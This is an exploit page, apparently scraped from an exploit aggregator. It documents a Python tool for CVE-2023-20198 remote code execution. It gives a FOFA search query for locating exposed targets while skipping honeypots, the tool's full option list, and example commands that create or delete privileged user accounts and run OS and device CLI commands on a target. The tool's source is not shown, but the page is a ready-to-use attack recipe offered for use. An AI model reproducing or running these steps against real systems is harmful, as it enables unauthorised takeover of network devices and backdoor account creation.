Share
## https://sploitus.com/exploit?id=0004572D-8F1A-5FA0-B583-57259E099827
# Fofa

```
body="<script>window.onload=function(){ url ='/webui';window.location.href=url;}</script>" && is_honeypot=false && is_fraud=false
```

# Usage

```
usage: CVE-2023-20198-RCE.py [-h] -u URL [-p PROXY] [-au ADD_USER] [-ap ADD_PASS] [-du DEL_USER] [-pm PRIVILEGE_MODE]
                             [-em EXPLOIT_MODE] [-oc OS_CMD] [-cc CLI_CMD]

CVE-2023-20198-RCE

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     target url to check, eg: http://example.com
  -p PROXY, --proxy PROXY
                        proxy url, eg: http://127.0.0.1:8083
  -au ADD_USER, --add-user ADD_USER
                        username to add.If left blank, an 8-digit mixed case English string will be randomly
                        generated.
  -ap ADD_PASS, --add-pass ADD_PASS
                        password to add.If left blank, an 8-digit mixed case English string will be randomly
                        generated.
  -du DEL_USER, --del-user DEL_USER
                        username to delete
  -pm PRIVILEGE_MODE, --privilege-mode PRIVILEGE_MODE
                        user/privileged
  -em EXPLOIT_MODE, --exploit-mode EXPLOIT_MODE
                        user/cmd
  -oc OS_CMD, --os-cmd OS_CMD
                        exec os command
  -cc CLI_CMD, --cli-cmd CLI_CMD
                        exec cli command
```

For example:

```powershell
python CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em cmd -pm privileged -cc "show version" 

python CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em cmd -oc "uname -a" 

python CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em user -au -ap

python CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em user -au hahahahha -ap hahahahha

python CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em user -du aaaaaa

```

![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240425153133359.png)